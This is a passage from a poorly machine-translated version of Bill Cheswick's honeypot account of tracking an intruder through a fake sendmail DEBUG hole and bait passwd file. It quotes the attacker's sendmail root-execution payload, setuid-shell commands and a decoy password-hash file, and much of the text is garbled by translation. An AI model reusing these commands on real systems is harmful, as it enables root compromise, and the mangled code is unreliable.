-- One night with berferd
Translation: Song chuanhua
Student ID: 19808031
------- I will dedicate this article to those who have already or are already a hacker. I hope that you will notice your security while cracking others. :)
In January 7, 1991, a hacker was convinced that he had discovered a DUBUG vulnerability in sendmail on our Internet gateway computer and tried to obtain our password file, I gave him a copy.
In a few months, we have tempted the hacker to make a variety of happy attempts so that we can find his location and use the cracking technology. This article is a detailed record of the hacker's "success" and failure, as well as the bait and trap we use.
Our conclusion is that this hacker has a lot of time, stubborn exception, and a list of outstanding system vulnerabilities. Once he has obtained a formal registration identity of the system, he can easily break UCP and bin accounts with those vulnerabilities, and then root. Our hackers are very interested in military targets and new machines that can help them transit their connections.
Introduction
Our secure Internet gateway was launched in January 1990. I want to know how often the whole castle door may be attacked. I understand that there are some people on the Internet who like to use "brute force". Who are they? Where will they attack? How often? What system vulnerabilities do they often try?
In fact, they did not destroy AT "amp; T, or even seldom patronize our door, so the ultimate pleasure is only like this, seduce a hacker into a well-designed environment, record all his actions, study his actions, and remind him to prevent his next target.
Most workstations on the Internet seldom provide tools to do this. Commercial systems detect and report issues, but they ignore a lot of things we want. Our gateway generates 10 MB log files every day. But what about attacks against services other than log records?
We added some fake services on the system, and I wrote a script file to retrieve daily logs. Check the following points:
FTP: the retrieval tool reports all registered and attempted user names every day. It also reports the user's use of tilde (this is an old version of ftp vulnerability) all accesses to the/etc/passwd and/etc/group of the ftp directory, and acquisition of the complete file list under the pub directory. It is common for passwd users to obtain the Registration Name of formal users of the system, and then attack and crack their passwords. Sometimes some system administrators put the real passwd file in the ftp/etc directory. We forged a passwd file, after the password is cracked, it is "why are you wasting your time."
Telnet/login: all attempts to log in are recorded. This makes it easy to see that some people are trying many accounts or attacking a certain account. Because we have no other users except the "guard" on the Internet gate, it is easy to find the problem.
Guest/visitor account: the first public account that hackers are looking. These accounts provide friendly and easy access to almost all system files, including passwd files. Hackers can also obtain the list of trusted hosts of machines by obtaining the/etc/hosts. equiv file or the. rhosts file of each user. The login script files of these accounts are written as follows:
Exec 2 "gt;/dev/null # ensure that stderr doesnt appear
Trap "quot;" quot; 1
/Bin/echo
(/Bin/echo "quot; Attempt to login to inet with $ LOGNAME from $ CALLER" quot; |
Upasname = adm/bin/mail ches dangelo "amp;
) 2 "gt;" amp; 1 | mail ches dangelo
/Bin/echo "quot;/tmp full" quot;
Sleep 5 # I love to make them wait ....
/Bin/echo "quot;/tmp full" quot;
/Bin/echo "quot;/tmp full" quot;
/Bin/echo
Sleep 60 #... and simulating a busy machine is useful
We must be careful so that the caller is not allowed to see the system flag error message (if the script we write is incorrect ). Note that $ CALLER is the host or IP address on the other end. By modifying telnetd or login, it can be obtained through environment variables.
Smtp debug: This command provides two traps for vulnerabilities waiting for sendmail. Although almost all product vendors have cleared the vulnerability, hackers occasionally try it. This vulnerability allows external users to use a script that is run as root. When someone tries this vulnerability, I get the script code that he tries.
Finger: Finger provides a lot of useful information to hackers: Account name, the last time this account was used, and some information that can be used to guess the password. Since our organization does not allow such information to be provided to others, we place a program that rejects the figner request after the fingerd caller of finger. (Of course, we will avoid endless loops of finger information from ourselves ). The report shows that there are dozens of finger requests every day, most of which are valid.
Rlogin/rsh: these commands are based on unconditional trust systems and are not supported by our machines. However, we will generate reports for users who use these commands by finger and Their attempts and user information.
Many of the above detectors use the figner command to identify the machines and users who call the tool.
When an attempt is shown as an illegal attempt, I send a message like this:
Inetfans postmaster@sdsu.edu
Yesterday someone from math.sdsu.edu fetched the/etc/passwd file
From our FTP directory. The file is not important but these probes
Are sometimes saved med from stolen accounts.
Just thought youd like to know.
Bill Cheswick
This is a typical letter sent to "inetfans" who belong to the Computer Emergency Response Team (Computer Emergency Response Team CERT), some interest groups, or people interested in some sites.
Many System Administrators pay great attention to these reports, especially military sites. Generally, the system administrator is very cooperative in solving these problems. The responses to these emails include apologies, rejection, Account suspension, and silence. When a website is open to support hacker activities, we will consider rejecting all information packages from the site.
Unfriendly action
We have set up these detectors since January 1990. Statistics show that the attack rate increases during the school holidays every year. Our attack rate may be higher than other sites, because we are widely known and considered a "Telephone Company ".
When a remote user removes a passwd file, not all of them are for malicious purposes. Sometimes they just want to see if the transmission works.
This is the log of the SMTP process. These seemingly mysterious logs usually contain two email senders to talk to each other. In this example, the other end is a command typed by a person. The first command he tried was DEBUG. He must be surprised when receiving the "250 OK" response. The key line is "rcpt :". The Section enclosed in angle brackets is usually the address of a mail receiver. It contains a command line. Sendmail uses Sendmail in DEBUG mode to run a command as ROOT. That is:
Sed-e 1 /? $/D |/bin/sh; exit 0 "quot;
It removes the mail header and uses the ROOT identity to execute the message body. This message was mailed to me, which was recorded by me, including the timestamp:
He wants us to mail him a copy of our passwd file. Probably used to run some passwd cracking programs. All of these test results come from a adrian user of EMBEZZLE. STANFORD. EDU. Half an hour after the U.S. air strikes on Iraq, he openly reacted. I suspect that Saddam hired one or two hackers. I happened to have a fake passwd file under the ftp directory, and I sent it to Stanford as root.
The next morning, I heard from Stanford that they knew about it and were discovering the problem. They said that the account was stolen.
On the next Sunday, I received a letter from France:
To: root@research.att.com
Subject: intruder
Date: Sun 20 Jan 91 15:02:53 0100
I have just closed an account on my machine
Which has been broken by an intruder coming from embezzle.stanford.edu. He
(She) has left a file called passwd. The contents are:
------------ "Gt;
From root@research.att.com Tue Jan 15 18:49:13 1991
Inclued: from research.att.com by embezzle. Stanford. EDU (5.61/4.7 );
Tue 15 Jan 91 18:49:12-0800
Message-Id: "lt; 9101160249.AA26092@embezzle.Stanford.EDU" gt;
From: root@research.att.com
Date: Tue 15 Jan 91 21: 48 EST
To: adrian@embezzle.stanford.edu
Root: mgajqD9nOAVDw: 0: 2: g0-admin (0000 ):/:
Daemon: *: 1: 1: Running -admin (0000 ):/:
Bin: *: 2: 2: Running -admin (0000):/bin:
Sys: *: 3: 3: Running -admin (0000):/usr/v9/src:
Adm: *: 4: 4: Running -admin (0000):/usr/adm:
Uucp: *: 5: 5: 0000-uucp (0000):/usr/lib/uucp:
Nuucp: *: 10: 10: 0000-uucp (0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
Ftp: anonymous: 71: 14: file transfer:/: no soap
Ches: j2PPWsiVal.. Q: 200: 1: me:/u/ches:/bin/sh
Dmr: a98tVGlT7GiaM: 202: 1: Dennis:/u/dmr:/bin/sh
Rtm: 5bHD/k5k2mTTs: 203: 1: Rob:/u/rtm:/bin/sh
Berferd: deJCw4bQcNT3Y: 204: 1: Fred:/u/berferd:/bin/sh
Td: PXJ. d9CgZ9DmA: 206: 1: Tom:/u/td:/bin/sh
Status: R
------------ Please let me know if you heard of him.
One night with Berferd
A few minutes later, someone tried to use DEBUG to run the command as ROOT, and he tried to modify our passwd file!
Cp/bin/sh/tmp/shell
Chmod 4755/tmp/shell
The connection is also from EMBEZZLE. STANFORD. EDU.
What should I do? I don't want him to really get a gateway account. Why did he bring him into the room? In this way, I will not be able to get his keyboard activity.
I should continue to look at other things he is paying attention to. Maybe I can manually simulate the operating system, which means I have to make him think the machine is slow because I cannot compare it with MIPS M/120. It also means that I have to simulate a consistent operating system.
I already have a requirement because he has a passwd.
Decision 1: ftp passwd is a real passwd.
There are two more:
Decision 2: gateway machine management is very poor. (DEBUG vulnerability exists, and passwd exists in the ftp directory ).
Decision 3: Gateway machines are extremely slow.
So I decided to let him think he had changed the pass